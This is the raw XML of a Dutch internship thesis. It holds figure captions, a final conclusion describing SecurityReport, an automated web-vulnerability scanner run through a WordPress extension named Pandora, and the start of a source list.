                          <a:ext cx="4318635" cy="5740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127A79" w14:textId="69428BD6" w:rsidR="00E2204E" w:rsidRPr="00DE5F14" w:rsidRDefault="00E2204E" w:rsidP="00D63E85">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="10469533" w14:textId="04BEEF1C" w:rsidR="00E2204E" w:rsidRPr="00DE5F14" w:rsidRDefault="00E2204E" w:rsidP="00006A7A">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>PDF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DF5D" id="Text Box 697" o:spid="_x0000_s1258" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:63.2pt;margin-top:11.85pt;width:340.05pt;height:45.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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="11127A79" w14:textId="69428BD6" w:rsidR="00E2204E" w:rsidRPr="00DE5F14" w:rsidRDefault="00E2204E" w:rsidP="00D63E85">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="10469533" w14:textId="04BEEF1C" w:rsidR="00E2204E" w:rsidRPr="00DE5F14" w:rsidRDefault="00E2204E" w:rsidP="00006A7A">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>PDFGenerator</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB305A1" w14:textId="77777777" w:rsidR="00006A7A" w:rsidRDefault="00006A7A"/>
    <w:p w14:paraId="10EBB9DF" w14:textId="48FECD32" w:rsidR="00006A7A" w:rsidRDefault="00EC4689">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253158400" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7212C05E" wp14:editId="15E2AC90">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>229235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>227965</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="685800"/>
                <wp:effectExtent l="0" t="0" r="38100" b="25400"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="715" name="Text Box 715"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="552450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7798B9B" w14:textId="02ED77D0" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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2C05E" id="Text Box 715" o:spid="_x0000_s1259" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:18.05pt;margin-top:17.95pt;width:435pt;height:5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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="37798B9B" w14:textId="02ED77D0" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E466552" w14:textId="6FBC1515" w:rsidR="00006A7A" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253152256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B1DAE8F" wp14:editId="1DAACDCA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>482600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>725170</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4606290" cy="3197860"/>
            <wp:effectExtent l="25400" t="25400" r="1651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DFGenerator.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4606290" cy="3197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57F15">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E701F" w14:textId="161A6637" w:rsidR="008F7E7F" w:rsidRDefault="00273374">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04274351" w14:textId="00969C9A" w:rsidR="008F7E7F" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253233152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13F64BF5" wp14:editId="7A4E3777">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>420161</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5419725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="830" name="Text Box 830"/>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06555" w14:textId="54443C47" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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4BF5" id="Text Box 830" o:spid="_x0000_s1260" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:33.1pt;margin-top:426.75pt;width:100pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="15406555" w14:textId="54443C47" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.24</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253153280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46F4A0CB" wp14:editId="2D027E83">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>477520</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2685415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4636135" cy="2656840"/>
            <wp:effectExtent l="25400" t="25400" r="37465" b="3556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DFGenerator 2.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4636135" cy="2656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8F7E7F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFC8A0A" w14:textId="4C9AD140" w:rsidR="00816199" w:rsidRDefault="00F03C4F">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253234176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A5A5B9D" wp14:editId="0DED8ADB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>419735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>7774940</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="831" name="Text Box 831"/>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1B35C" w14:textId="3C1AC909" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur 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A5B9D" id="Text Box 831" o:spid="_x0000_s1261" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:33.05pt;margin-top:612.2pt;width:100pt;height:18pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3791B35C" w14:textId="3C1AC909" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.25</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E850AB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253161472" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00B00FE2" wp14:editId="57B7EEFC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>421005</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1372870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5182235" cy="6294755"/>
            <wp:effectExtent l="25400" t="25400" r="24765" b="29845"/>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port html.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5182235" cy="629475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9E58B4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253162496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3318EAD4" wp14:editId="154D1BCF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>419100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>228600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5142865" cy="802640"/>
                <wp:effectExtent l="0" t="0" r="13335" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="768" name="Text Box 768"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5142865"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C707A1" w14:textId="745858F5" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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EAD4" id="Text Box 768" o:spid="_x0000_s1262" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:33pt;margin-top:18pt;width:404.95pt;height:63.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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="32C707A1" w14:textId="745858F5" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008F7E7F" w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253160448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60661B87" wp14:editId="4D0563C0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-913130</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-909320</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="746" name="Rectangle 7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C9B8F" id="Rectangle 746" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.9pt;margin-top:-71.55pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA7657">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4664F64C" w14:textId="77777777" w:rsidR="00D32EF9" w:rsidRPr="00C26333" w:rsidRDefault="00D32EF9" w:rsidP="00C26333">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="779"/>
        </w:tabs>
        <w:sectPr w:rsidR="00D32EF9" w:rsidRPr="00C26333" w:rsidSect="00241096">
          <w:headerReference w:type="default" r:id="rId120"/>
          <w:headerReference w:type="first" r:id="rId121"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="402" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D6D44CB" w14:textId="0754D9D5" w:rsidR="00344273" w:rsidRPr="00AC06C2" w:rsidRDefault="007460D6" w:rsidP="002B4BAC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC06C2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253239296" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17595FE9" wp14:editId="10F537AC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-902335</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="841" name="Rectangle 8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63E1" id="Rectangle 841" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.85pt;margin-top:-71pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AC06C2" w:rsidRPr="00AC06C2">
        <w:t>Eindconclusie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F2E486" w14:textId="50375C47" w:rsidR="002B21CF" w:rsidRDefault="004432D2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253237248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0CBEF51F" wp14:editId="6A99D8A0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-10795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>216535</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5778500" cy="7769860"/>
                <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="800" name="Text Box 800"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5778500" cy="7769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44C3" w14:textId="0B071F5D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Aan de hand van mijn onderzoek en Proof of Concept zal ik antwoord geven op de onderstaande hoofdvraag die aan het begin van dit project is vastgesteld.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="27EEB0F3" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="5BF5AE5A" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">Hiervoor heb ik onderzoek gedaan naar drie onderwerpen. De drie onderwerpen zijn: web kwetsbaarheden, webapplicatie scanners en technologieën. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47EE461C" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="69E0B1EF" w14:textId="7B2EA7F4" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="7A1F920D" w14:textId="3E5DDF6A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4220A2AB" w14:textId="565ED92C" w:rsidR="00E2204E" w:rsidRPr="007C4606" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="747D291D" w14:textId="7F0F32D2" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:contextualSpacing/>
                            </w:pPr>
                            <w:r>
                              <w:t>Deze drie onderzoeken vormden de basis van het concept dat ik tijdens mijn afstudeerstage heb ontwikkeld. SecurityReport, een geautomatiseerde webapplicatie scanner die bediend wordt met een Wordpress Extensie met de naam Pandora die op basis van het verdienmodel Freemium zorgt voor leads (potentiele nieuwe klanten) en een gratis scan aanbiedt aan klanten die een website bij S5 laten bouwen. Het Proof of Concept is over mijn stageperiode meedere malen getest (Bijlage, Test resultaten) en uit deze test is gebleken dat het inderdaad bewijst dat het kwetsbaarheden kan identificeren op websites.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2B4AF865" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"/>
                          <w:p w14:paraId="4D2A2CE5" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E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EF51F" id="Text Box 800" o:spid="_x0000_s1263" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.85pt;margin-top:17.05pt;width:455pt;height:611.8pt;z-index:2532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t8c3wCAABnBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI2wEt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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="70C544C3" w14:textId="0B071F5D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Aan de hand van mijn onderzoek en Proof of Concept zal ik antwoord geven op de onderstaande hoofdvraag die aan het begin van dit project is vastgesteld.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="27EEB0F3" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="5BF5AE5A" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Hiervoor heb ik onderzoek gedaan naar drie onderwerpen. De drie onderwerpen zijn: web kwetsbaarheden, webapplicatie scanners en technologieën. </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="47EE461C" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="69E0B1EF" w14:textId="7B2EA7F4" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="7A1F920D" w14:textId="3E5DDF6A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4220A2AB" w14:textId="565ED92C" w:rsidR="00E2204E" w:rsidRPr="007C4606" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="747D291D" w14:textId="7F0F32D2" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:contextualSpacing/>
                      </w:pPr>
                      <w:r>
                        <w:t>Deze drie onderzoeken vormden de basis van het concept dat ik tijdens mijn afstudeerstage heb ontwikkeld. SecurityReport, een geautomatiseerde webapplicatie scanner die bediend wordt met een Wordpress Extensie met de naam Pandora die op basis van het verdienmodel Freemium zorgt voor leads (potentiele nieuwe klanten) en een gratis scan aanbiedt aan klanten die een website bij S5 laten bouwen. Het Proof of Concept is over mijn stageperiode meedere malen getest (Bijlage, Test resultaten) en uit deze test is gebleken dat het inderdaad bewijst dat het kwetsbaarheden kan identificeren op websites.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2B4AF865" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"/>
                    <w:p w14:paraId="4D2A2CE5" w14:textId="77777777" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA6D0D" w14:textId="17B5D6C8" w:rsidR="00443E7D" w:rsidRDefault="00443E7D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:smallCaps/>
          <w:spacing w:val="5"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D846ECE" w14:textId="067E4BFD" w:rsidR="00886D84" w:rsidRPr="0089550C" w:rsidRDefault="007460D6" w:rsidP="001876C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253241344" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04F9A5E4" wp14:editId="07B0CBB2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-904875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-895350</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="843" name="Rectangle 8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4A912" id="Rectangle 843" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.25pt;margin-top:-70.45pt;width:25pt;height:1031.7pt;z-index:-2500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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00886D84" w:rsidRPr="0089550C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Bronnenlijst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFB14B2" w14:textId="34D9D27E" w:rsidR="007D3A19" w:rsidRPr="0030691F" w:rsidRDefault="007D3A19" w:rsidP="007D3A19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EDA7A7B" w14:textId="77777777" w:rsidR="00D877E4" w:rsidRDefault="00B534F2" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve">Securi </w:t>
      </w:r>
      <w:r w:rsidR="00257E5A" w:rsidRPr="00CC5BFC">
        <w:t>(2016). Website Hacked Trend Report.</w:t>
      </w:r>
      <w:r w:rsidR="00921538" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC5BFC">
        <w:t>Geraadpleegd van</w:t>
      </w:r>
      <w:r w:rsidR="002E7D5C" w:rsidRPr="00CC5BFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B9FB1" w14:textId="2E99986D" w:rsidR="00886D84" w:rsidRDefault="00F22B90" w:rsidP="00083203">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId122" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00CC5BFC">
